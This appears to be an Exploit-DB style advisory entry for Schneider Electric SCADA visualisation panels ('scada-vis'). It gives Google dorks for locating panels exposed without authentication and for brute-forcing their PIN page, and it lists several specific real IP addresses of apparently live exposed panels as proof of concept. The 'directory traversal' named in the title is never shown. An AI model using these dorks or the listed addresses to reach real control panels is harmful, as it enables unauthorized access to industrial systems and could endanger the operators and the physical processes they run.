Schneider Electric v1.0 - Directory traversal & Broken Authentication

vendor:

by:

parsa rezaie khiabanloo

7.5

CVSS

HIGH

Directory traversal & Broken Authentication

CWE

Product Name:

Affected Version From: all-versions

Affected Version To: all-versions

Patch Exists:

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows/Linux/Android

2023

Schneider Electric v1.0 – Directory traversal & Broken Authentication

Attacker can using these dorks and access to the panel without password: inurl:/cgi-bin/scada-vis/, inurl:/scada-vis/schedulers, inurl:/cgi-bin/scada-vis/index.cgi, inurl:/scada-vis, inurl:/cgi-bin/scada-vis/touch.html. Attacker can these this dork for bruteforce the panel: inurl:/scada-vis/pin?return=index.

Mitigation:

Source

Exploit-DB raw data:

# Exploit Title: Schneider Electric v1.0 - Directory traversal & Broken Authentication 
# Google Dork: inurl:/scada-vis 
# Date: 3/11/2023
# Exploit Author: parsa rezaie khiabanloo
# Vendor Homepage: https://www.se.com/
# Version: all-versions
# Tested on: Windows/Linux/Android

# Attacker can using these dorks and access to the panel without password

inurl:/cgi-bin/scada-vis/

inurl:/scada-vis/schedulers

inurl:/cgi-bin/scada-vis/index.cgi

inurl:/scada-vis 

inurl:/cgi-bin/scada-vis/touch.html

POC :

http://185.73.103.144:8080/cgi-bin/scada-vis/index.cgi

http://185.73.103.38:8080/cgi-bin/scada-vis/touch.html

http://88.213.153.98/cgi-bin/scada-vis/schedulers.cgi


# Attacker can these this dork for bruteforce the panel 

inurl:/scada-vis/pin?return=index

POC : 

http://143.176.129.1/scada-vis/pin?return=index

http://62.163.74.206/scada-vis/pin?return=touch